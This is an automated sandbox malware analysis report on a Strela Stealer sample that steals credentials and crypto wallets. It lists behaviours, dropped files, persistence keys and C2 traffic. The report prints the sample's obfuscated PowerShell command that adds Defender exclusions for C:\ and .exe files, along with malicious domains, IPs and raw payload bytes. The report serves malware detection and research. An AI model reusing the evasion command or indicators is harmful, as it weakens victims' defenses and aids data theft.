Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23820.12149.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.23820.12149.exe
Analysis ID:1632299
MD5:c4e6239cad71853ac5330ab665187d9f
SHA1:845e3aa5bf52c5eef683d98fb68f00fd6bb0f5c0
SHA256:4ba27a9d19e6717ba3049c8a99a1127a431c5639121cff564f35711bea613745
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Strela Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Strela Stealer
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential PowerShell Command Line Obfuscation
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.23820.12149.exe (PID: 5044 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe" MD5: C4E6239CAD71853AC5330AB665187D9F)
    • powershell.exe (PID: 652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • a.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Roaming\a.exe" MD5: 645A45D81803813EC953409B49468E69)
      • chrome.exe (PID: 8024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 1136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 8044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1d4f38,0x7ffc9d1d4f44,0x7ffc9d1d4f50 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 3432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:2 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • Gelelx.exe (PID: 9184 cmdline: "C:\Users\user\AppData\Local\Temp\Gelelx.exe" MD5: 5648BC0CB4AE58D07BB6C8789C560B1C)
        • Vhbyv.exe (PID: 3152 cmdline: "C:\Users\user\AppData\Local\Temp\Vhbyv.exe" MD5: 922D612E9A3CFEE599C708C68E10A512)
          • Vhbyv.exe (PID: 4032 cmdline: "C:\Users\user\AppData\Local\Temp\Vhbyv.exe" MD5: 922D612E9A3CFEE599C708C68E10A512)
        • Gelelx.exe (PID: 3148 cmdline: "C:\Users\user\AppData\Local\Temp\Gelelx.exe" MD5: 5648BC0CB4AE58D07BB6C8789C560B1C)
  • svchost.exe (PID: 7208 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • license.exe (PID: 2336 cmdline: "C:\Users\user\AppData\Roaming\license.exe" MD5: 795F83B492C7B77A2C9005144ECCE403)
    • license.exe (PID: 8336 cmdline: "C:\Users\user\AppData\Roaming\license.exe" MD5: 795F83B492C7B77A2C9005144ECCE403)
  • hosts.exe (PID: 8496 cmdline: "C:\Users\user\AppData\Roaming\hosts.exe" MD5: EB1CDECFD9970F668E64DFDBB2FB92C6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.2093956050.00000000059F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000010.00000002.1993362818.00000000033C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0000000B.00000002.1825728911.0000000005910000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.a.exe.5910000.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              16.2.Gelelx.exe.59f0000.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                16.2.Gelelx.exe.59f0000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  21.2.license.exe.4435630.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    21.2.license.exe.41706c8.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Potential PowerShell Command Line Obfuscation
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ParentProcessId: 5044, ParentProcessName: SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , ProcessId: 652, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ParentProcessId: 5044, ParentProcessName: SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , ProcessId: 652, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\license.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Gelelx.exe, ProcessId: 9184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\license
                      Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessId: 5044, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1l2zyuj.o2o.ps1
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ParentProcessId: 5044, ParentProcessName: SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , ProcessId: 652, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7208, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T21:57:03.362111+010018100032Potentially Bad Traffic185.170.144.3880192.168.2.449714TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T21:57:03.362105+010018100002Potentially Bad Traffic192.168.2.449714185.170.144.3880TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://poolfreshstep.comAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\license.exeAvira: detection malicious, Label: HEUR/AGEN.1340047
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeAvira: detection malicious, Label: TR/AD.Nekark.slcke
                      Source: C:\Users\user\AppData\Roaming\a.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeAvira: detection malicious, Label: HEUR/AGEN.1326414
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Roaming\a.exeReversingLabs: Detection: 55%
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeVirustotal: Detection: 16%Perma Link
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49717 version: TLS 1.2
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000000.1141870986.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, a.exe, 0000000B.00000002.1787672422.00000000035FA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: chrome_elf.dll.pdb source: chrome.exe, 0000000D.00000000.1383267169.00007FFC9D18F000.00000002.00000001.01000000.0000000B.sdmp
                      Source: Binary string: protobuf-net.pdb source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03331599h16_2_03331734
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03331599h16_2_03331538
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03331599h16_2_03331528
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03336B04h16_2_03336AC7
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03336B04h16_2_033369E8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03336B04h16_2_033369D8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03330E81h16_2_03330E00
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 4x nop then jmp 03330E81h16_2_03330DF1
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB1599h21_2_02BB1734
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB1599h21_2_02BB1538
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB1599h21_2_02BB152B
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB6B04h21_2_02BB6AC7
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB6B04h21_2_02BB69E8
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB6B04h21_2_02BB69D8
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB0E81h21_2_02BB0E00
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 4x nop then jmp 02BB0E81h21_2_02BB0DF1
                      Source: chrome.exeMemory has grown: Private usage: 1MB later: 63MB
                      Source: global trafficTCP traffic: 192.168.2.4:49720 -> 111.90.145.132:7798
                      Source: global trafficTCP traffic: 192.168.2.4:49750 -> 196.251.69.16:39001
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 20:57:03 GMTContent-Type: application/octet-streamContent-Length: 369152Last-Modified: Thu, 20 Feb 2025 13:20:07 GMTConnection: keep-aliveETag: "67b72c07-5a200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 2c ff a3 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 98 05 00 00 08 00 00 00 00 00 00 0e b7 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 b6 05 00 4b 00 00 00 00 c0 05 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 97 05 00 00 20 00 00 00 98 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 68 05 00 00 00 c0 05 00 00 06 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 b6 05 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 23 00 00 f0 10 00 00 03 00 00 00 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 1b 30 07 00 b6 00 00 00 01 00 00 11 73 01 00 00 0a 20 f4 01 00 00 20 87 13 00 00 6f 02 00 00 0a 18 5a 0a 06 18 5d 39 0b 00 00 00 06 20 87 13 00 00 3f 8b 00 00 00 28 09 00 00 06 75 09 00 00 01 6f 03 00 00 0a 7e 02 00 00 04 25 3a 17 00 00 00 26 7e 01 00 00 04 fe 06 06 00 00 06 73 04 00 00 0a 25 80 02 00 00 04 28 01 00 00 2b 6f 06 00 00 0a 0b 38 2d 00 00 00 07 6f 07 00 00 0a 0c 08 6f 08 00 00 0a 25 3a 06 00 00 00 26 38 14 00 00 00 08 6f 09 00 00 0a 20 00 01 00 00 14 14 14 28 0a 00 00 0a 26 07 6f 0b 00 00 0a 3a c8 ff ff ff dd 0d 00 00 00 07 39 06 00 00 00 07 6f 0c 00 00 0a dc 2a 00 00 01 10 00 00 02 00 66 00 42 a8 00 0d 00 00 00 00 1b 30 05 00 f0 00 00 00 02 00 00 11 28 0f 00 00 0a 0a 06 20 00 01 00 00 6f 10 00 00 0a 06 20 00 01 00 00 6f 10 00 00 0a 06 72 15 00 00 70 28 11 00 00 0a 6f 12 00 00 0a 06 72 6f 00 00 70 28 11 00 00 0a 6f 13 00 00 0a 06 06 6f 14 00 00 0a 06 6f 15 00 00 0a 6f 16 00 00 0a 0b 73 1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 20:57:29 GMTContent-Type: application/octet-streamContent-Length: 6461440Last-Modified: Thu, 10 Oct 2024 19:55:52 GMTConnection: keep-aliveETag: "67083148-629800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 e5 b4 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 8c 62 00 00 0a 00 00 00 00 00 00 0e aa 62 00 00 20 00 00 00 c0 62 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 63 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 a9 62 00 4b 00 00 00 00 c0 62 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 62 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 8a 62 00 00 20 00 00 00 8c 62 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 06 00 00 00 c0 62 00 00 08 00 00 00 8e 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 62 00 00 02 00 00 00 96 62 00 00 00 00 00 00 00 00 00 00 00 